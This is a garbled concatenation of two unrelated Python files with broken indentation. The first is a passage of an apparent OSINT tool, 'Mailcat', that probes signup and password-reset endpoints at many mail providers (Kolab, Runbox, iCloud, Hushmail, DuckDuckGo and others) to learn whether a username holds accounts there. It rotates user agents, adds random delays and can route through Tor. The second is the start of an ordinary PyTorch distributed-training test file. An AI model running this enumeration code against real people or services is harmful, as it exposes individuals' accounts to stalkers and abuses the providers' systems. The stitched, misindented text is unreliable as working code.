"journalistmail.ch",
"legalprivilege.ch",
"libertymail.co",
"libertymail.net",
"mailatlaw.ch",
"medicmail.ch",
"medmail.ch",
"mykolab.ch",
"myswissmail.ch",
"opengroupware.ch",
"pressmail.ch",
"swisscollab.ch",
"swissgroupware.ch",
"switzerlandmail.ch",
"trusted-legal-mail.ch",
"kolabnow.com",
"kolabnow.ch"]
''' # old cool version ;(
kolabURL = "https://kolabnow.com:443/cockpit/json.php"
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": "https://kolabnow.com/cockpit/signup/individual",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"}
try:
kolabStatus = sreq.post(kolabURL, headers=headers)
print(kolabStatus.status_code)
if kolabStatus.status_code == 200:
for kolabdomain in kolabLst:
kolabPOST = {"validate": "username",
"accounttype": "individual",
"username": target,
"domain": kolabdomain,
"_action_": "/signup/validate"}
try:
chkKolab = sreq.post(kolabURL, headers=headers, data=kolabPOST)
if chkKolab.status_code == 200:
kolabJSON = chkKolab.json()
if kolabJSON['errors']:
suc = "This email address is not available"
if kolabJSON['errors']['username'] == suc:
print("[+] Success with {}@{}".format(target, kolabdomain))
except Exception as e:
pass
sleep(random.uniform(1, 3))
except Exception as e:
#pass
print e
'''
kolabURL = "https://kolabnow.com/api/auth/signup"
headers = {"User-Agent": random.choice(uaLst),
"Referer": "https://kolabnow.com/signup/individual",
"Content-Type": "application/json;charset=utf-8",
"X-Test-Payment-Provider": "mollie",
"X-Requested-With": "XMLHttpRequest"}
sreq = req_session_fun()
kolabStatus = sreq.post(kolabURL, headers={"User-Agent": random.choice(uaLst)}, timeout=10)
if kolabStatus.status_code == 422:
kolabpass = randstr(12)
kolabsuc = "The specified login is not available."
for kolabdomain in kolabLst:
kolabPOST = {"login": target,
"domain": kolabdomain,
"password": kolabpass,
"password_confirmation": kolabpass,
"voucher": "",
"code": "bJDmpWw8sO85KlgSETPWtnViDgQ1S0MO",
"short_code": "VHBZX"}
try:
# chkKolab = sreq.post(kolabURL, headers=headers, data=kolabPOST)
chkKolab = sreq.post(kolabURL, headers=headers, data=json.dumps(kolabPOST), timeout=10)
                # print(chkKolab.text)
                if chkKolab.status_code == 200:
                    kolabJSON = chkKolab.json()
                    if kolabJSON["errors"]["login"] == kolabsuc:
                        # print("[+] Success with {}@{}".format(target, kolabdomain))
                        result.setdefault("Kolab", []).append("{}@{}".format(target, kolabdomain))
except Exception as e:
pass
return result
def bigmir(target, req_session_fun) -> Dict:
result = {}
bigmirSucc = []
bigmirMail = ["i.ua", "ua.fm", "email.ua"]
sreq = req_session_fun()
for maildomain in bigmirMail:
try:
bigmirChkJS = "https://passport.i.ua/js/free.js?15908746259240-xml"
headers = {
'Pragma': 'no-cache',
'Origin': 'https://passport.i.ua',
'User-Agent': random.choice(uaLst),
'Content-Type': 'application/octet-stream',
'Referer': 'https://passport.i.ua/registration/'
}
bm_data = "login={}@{}".format(target, maildomain)
bigmirChk = sreq.post(bigmirChkJS, headers=headers, data=bm_data, timeout=10)
if bigmirChk.status_code == 200:
exist = "'free': false"
if "'free': false" in bigmirChk.text:
bigmirSucc.append("{}@{}".format(target, maildomain))
sleep(random.uniform(2, 4))
except Exception as e:
pass
if bigmirSucc:
result["Bigmir"] = bigmirSucc
return result
def tutby(target, req_session_fun) -> Dict: # Down
result = {}
smtp_check = code250('tut.by', target)
if smtp_check:
result['Tut.by'] = smtp_check[0]
return result
sreq = req_session_fun()
try:
target64 = str(base64.b64encode(target.encode()))
tutbyChkURL = "https://profile.tut.by/requests/index.php"
headers = {
'Pragma': 'no-cache',
'Origin': 'https://profile.tut.by',
'User-Agent': random.choice(uaLst),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://profile.tut.by/register.html',
'X-Requested-With': 'XMLHttpRequest'
}
tutbyData = f"action=lgval&l={target64}"
tutbyChk = sreq.post(tutbyChkURL, headers=headers, data=tutbyData, timeout=10)
if tutbyChk.status_code == 200:
exist = '[{"success":true}]'
if exist == tutbyChk.text:
result['Tut.by'] = '{}@tut.by'.format(target)
# print("[+] Success with {}@tut.by".format(target))
pass
except Exception as e:
pass
return result
def xmail(target, req_session_fun) -> Dict:
result = {}
sreq = req_session_fun()
xmailURL = "https://xmail.net:443/app/signup/checkusername"
headers = {"User-Agent": random.choice(uaLst),
"Accept": "application/json, text/javascript, */*",
"Referer": "https://xmail.net/app/signup",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close"}
xmailPOST = {"username": target, "firstname": '', "lastname": ''}
try:
xmailChk = sreq.post(xmailURL, headers=headers, data=xmailPOST, timeout=10).json()
if not xmailChk['username']:
result["Xmail"] = "{}@xmail.net".format(target)
except Exception as e:
pass
return result
def ukrnet(target, req_session_fun) -> Dict:
result = {}
ukrnet_reg_urk = "https://accounts.ukr.net:443/registration"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"}
sreq = req_session_fun()
try:
get_reg_ukrnet = sreq.get(ukrnet_reg_urk, headers=headers, timeout=10)
if get_reg_ukrnet.status_code == 200:
ukrnet_cookies = sreq.cookies.get_dict()
if ukrnet_cookies:
ukrnetURL = "https://accounts.ukr.net:443/api/v1/registration/reserve_login"
ukrnetPOST = {"login": target}
ukrnetChk = sreq.post(ukrnetURL, headers=headers, cookies=ukrnet_cookies, json=ukrnetPOST, timeout=10)
if ukrnetChk.status_code == 200:
if not ukrnetChk.json()['available']:
result["UkrNet"] = "{}@ukr.net".format(target)
except Exception as e:
pass
return result
def runbox(target, req_session_fun) -> Dict:
result = {}
runboxSucc = []
runboxLst = ["mailhost.work",
"mailhouse.biz",
"messagebox.email",
"offshore.rocks",
"rbox.co",
"rbox.me",
"rbx.email",
"rbx.life",
"rbx.run",
"rnbx.uk",
"runbox.at",
"runbox.biz",
"runbox.bz",
"runbox.ch",
"runbox.co",
"runbox.co.in",
"runbox.com",
"runbox.dk",
"runbox.email",
"runbox.eu",
"runbox.is",
"runbox.it",
"runbox.ky",
"runbox.li",
"runbox.me",
"runbox.nl",
"runbox.no",
"runbox.uk",
"runbox.us",
"xobnur.uk"]
headers = {"User-Agent": random.choice(uaLst),
"Origin": "https://runbox.com",
"Referer": "https://runbox.com/signup?runbox7=1"}
sreq = req_session_fun()
for rboxdomain in runboxLst:
data = {"type": "person", "company": "", "first_name": "", "last_name": "", "user": target,
"userdomain": "domainyouown.com", "runboxDomain": rboxdomain, "password": "",
"password_strength": "", "email_alternative": "", "phone_number_cellular": "",
"referrer": "", "phone_number_home": "", "g-recaptcha-response": "",
"h-captcha-response": "", "signup": "%A0Set+up+my+Runbox+account%A0",
"av": "y", "as": "y", "domain": "", "accountType": "person", "domainType": "runbox",
"account_number": "", "timezone": "undefined", "runbox7": "1"}
chkRunbox = sreq.post('https://runbox.com/signup/signup', headers=headers, data=data, timeout=5)
if chkRunbox.status_code == 200:
if "The specified username is already taken" in chkRunbox.text:
runboxSucc.append("{}@{}".format(target, rboxdomain))
sleep(random.uniform(1, 2.1))
if runboxSucc:
result["Runbox"] = runboxSucc
return result
def iCloud(target, req_session_fun) -> Dict:
result: Dict[str, List] = {}
domains = [
'icloud.com',
'me.com',
'mac.com',
]
for domain in domains:
email = f'{target}@{domain}'
sreq = req_session_fun()
headers = {
'User-Agent': random.choice(uaLst),
'sstt': 'zYEaY3WeI76oAG%2BCNPhCiGcKUCU0SIQ1cIO2EMepSo8egjarh4MvVPqxGOO20TYqlbJI%2Fqs57WwAoJarOPukJGJvgOF7I7C%2B1jAE5vZo%2FSmYkvi2e%2Bfxj1od1xJOf3lnUXZlrnL0QWpLfaOgOwjvorSMJ1iuUphB8bDqjRzyb76jzDU4hrm6TzkvxJdlPCCY3JVTfAZFgXRoW9VlD%2Bv3VF3in1RSf6Er2sOS12%2FZJR%2Buo9ubA2KH9RLRzPlr1ABtsRgw6r4zbFbORaKTSVWGDQPdYCaMsM4ebevyKj3aIxXa%2FOpS6SHcx1KrvtOAUVhR9nsfZsaYfZvDa6gzpcNBF9domZJ1p8MmThEfJra6LEuc9ssZ3aWn9uKqvT3pZIVIbgdZARL%2B6SK1YCN7',
'Content-Type': 'application/json',
}
        data = {'id': email}
        try:
            check = sreq.post('https://iforgot.apple.com/password/verify/appleid', headers=headers,
                              data=json.dumps(data), allow_redirects=False, timeout=5)
            if check.headers and check.headers.get('Location', '').startswith('/password/authenticationmethod'):
                if not result:
                    result = {'iCloud': []}
                result['iCloud'].append(email)
        except Exception as e:
            pass
return result
def duckgo(target, req_session_fun) -> Dict:
result = {}
duckURL = "https://quack.duckduckgo.com/api/auth/signup"
headers = {"User-Agent": random.choice(uaLst), "Origin": "https://duckduckgo.com", "Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-site", "Te": "trailers", "Referer": "https://duckduckgo.com/"}
data = {
"code": (None, "01337"),
"user": (None, target),
"email": (None, "mail@example.com")
}
sreq = req_session_fun()
try:
checkDuck = sreq.post(duckURL, headers=headers, data=data, timeout=5)
# if checkDuck.json()['error'] == "unavailable_username":
if "unavailable_username" in checkDuck.text:
result["DuckGo"] = "{}@duck.com".format(target)
except Exception as e:
pass
return result
def ctemplar(target, req_session_fun) -> Dict:
result = {}
sreq = req_session_fun()
ctURL = "https://api.ctemplar.com/auth/check-username/"
ctJSON = {"username": target}
headers = {"User-Agent": random.choice(uaLst),
"Accept": "application/json, text/plain, */*",
"Referer": "https://mail.ctemplar.com/",
"Content-Type": "application/json",
"Origin": "https://mail.ctemplar.com"}
try:
        chkCT = sreq.post(ctURL, headers=headers, json=ctJSON, timeout=10)
if chkCT.status_code == 200:
ct_exists = chkCT.json()['exists']
if ct_exists:
result["CTemplar"] = "{}@ctemplar.com".format(target)
except Exception as e:
pass
return result
def hushmail(target, req_session_fun) -> Dict:
result = {}
hushDomains = ["hushmail.com", "hush.com", "therapyemail.com", "counselingmail.com", "therapysecure.com", "counselingsecure.com"]
hushSucc = []
sreq = req_session_fun()
hush_ts = int(datetime.datetime.now().timestamp())
hushURL = "https://secure.hushmail.com/signup/create?format=json"
ref_header = "https://secure.hushmail.com/signup/?package=hushmail-for-healthcare-individual-5-form-monthly&source=website&tag=page_business_healthcare,btn_healthcare_popup_signup_individual&coupon_code="
hush_UA = random.choice(uaLst)
hushpass = randstr(15)
for hushdomain in hushDomains:
# hushpass = randstr(15)
hush_ts = int(datetime.datetime.now().timestamp())
headers = {"User-Agent": hush_UA,
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Hush-Ajax-Start-Time": str(hush_ts), "X-Requested-With": "XMLHttpRequest",
"Origin": "https://secure.hushmail.com", "Referer": ref_header,
"Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
data = {"hush_customerid": '', "hush_exitmethod": "GET",
"skin": "bootstrap311", "hush_cc_country": '',
"trial_mode": '', "parent": '', "parent_code": '',
"coupon_code": '', "form_token": "6e1555a603f6e762a090e6f6b885122f_dabaddeadbee",
"__hushform_extra_fields": '', "hush_username": target, "hush_domain": hushdomain,
"hush_pass1": hushpass, "hush_pass2": hushpass,
"hush_exitpage": "https://secure.hushmail.com/pay?package=hushmail-for-healthcare-individual-5-form-monthly",
"package": "hushmail-for-healthcare-individual-5-form-monthly",
"hush_reservation_code": '', "hush_customerid": '', "hush_tos": '', "hush_privacy_policy": '',
"hush_additional_tos": '', "hush_email_opt_in": '', "isValidAjax": "newaccountform"}
try:
hushCheck = sreq.post(hushURL, headers=headers, data=data, timeout=5)
if hushCheck.status_code == 200:
if "'{}' is not available".format(target) in hushCheck.json()['formValidation']['hush_username']:
hushMail = "{}@{}".format(target, hushdomain)
hushSucc.append(hushMail)
except Exception as e:
pass
sleeper(hushDomains, 1.1, 2.2)
if hushSucc:
result["HushMail"] = hushSucc
return result
####################################################################################
def show_banner():
banner = r"""
,-. ^
( ( _,---._ __ / \
) ) .-' `./ / \
( ( ,' `/ /:
\ `-" \'\ / |
. , \ \ / |
/ @ ,'-`----Y |
( ; : :
| .-. _,-' | /
| | ( ( | /
) ( \ `.___________:/
`..' `--' :mailcat:
"""
for color, part in zip(range(75, 89), banner.split('\n')[1:]):
print("\033[1;38;5;{}m{}\033[0m".format(color, part))
sleep(0.1337)
def print_results(checker, target, req_session_fun, is_verbose_mode):
checker_name = checker.__name__
if is_verbose_mode:
print(f'Running {checker_name} checker for {target}...')
    try:
        res = checker(target, req_session_fun)
    except Exception as e:
        print(f'Error while checking {checker_name}: {e}')
        return
    if not res:
        if is_verbose_mode:
            print(f'No results for {checker_name}')
        res = {}
for provider, emails in res.items():
print(f'\033[1;38;5;75m{provider}: \033[0m')
if isinstance(emails, str):
emails = [emails]
for email in emails:
print(f'* {email}')
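# Illustrative sketch (not part of the original flow): every checker can also be
# called on its own; it takes a username and a session factory and returns a dict
# mapping a provider name to the addresses found, for example:
#   hits = proton("johndoe", simple_session)        # -> {'Proton': ['johndoe@pm.me', ...]}
#   hits.update(mailRu("johndoe", simple_session))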
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Mailcat",
)
parser.add_argument(
'-p',
'--provider',
action="append",
metavar='<mail providers names>',
dest="providers",
default=[],
help="Specify one or more mail providers by name",
)
parser.add_argument(
"username",
nargs='*',
metavar="USERNAME",
help="One username to search emails by",
)
parser.add_argument(
'-l',
'--list',
action="store_true",
default=False,
help="List all the supported providers",
)
parser.add_argument(
'-s',
'--silent',
action="store_true",
default=False,
help="Hide wonderful mailcat intro animation",
)
parser.add_argument(
'-v',
'--verbose',
action="store_true",
default=False,
help="Verbose output about search progress.",
)
parser.add_argument(
'--tor',
action="store_true",
default=False,
help="Use Tor where you need it",
)
args = parser.parse_args()
all_checkers = [gmail, yandex, proton, mailRu,
rambler, tuta, yahoo, outlook,
zoho, eclipso, posteo, mailbox,
firemail, fastmail, startmail,
bigmir, tutby, xmail, ukrnet,
runbox, iCloud, duckgo, hushmail,
                    ctemplar]  # kolab and lycos excluded (unreliable / false positives)
if not args.silent:
show_banner()
if args.list:
print('Supported email providers: ')
print(' ' + ', '.join(map(lambda f: f.__name__, all_checkers)))
target = args.username
if len(target) != 1:
        print('Please specify one username to search!')
sys.exit(1)
else:
target = target[0]
if "@" in target:
target = target.split('@')[0]
uaLst = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"]
if args.providers:
pset = set(args.providers)
checkers = [c for c in all_checkers if c.__name__ in pset]
if not checkers:
        print(f'Cannot find providers: {", ".join(args.providers)}')
        sys.exit(1)
else:
checkers = all_checkers
if args.tor:
req_session_fun = via_tor
else:
req_session_fun = simple_session
threads = []
for checker in checkers:
t = threading.Thread(target=print_results, args=(checker, target, req_session_fun, args.verbose))
t.start()
threads.append(t)
for t in threads:
t.join()
|
test_c10d_common.py
|
import copy
import os
import sys
import tempfile
import threading
import time
import unittest
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
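# Illustrative example (assuming 4 visible GPUs and world_size=2):
#   gpus_for_rank(2) -> [[0, 1], [2, 3]], i.e. rank 0 uses GPUs 0-1 and rank 1 uses GPUs 2-3.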
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
        # The DistributedDataParallel tests don't seem to call the FileStore destructor.
        # TODO: investigate; the test is known to have issues.
        # Use this hack to remove the file left behind by the test.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
        integers, a list of `torch.device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
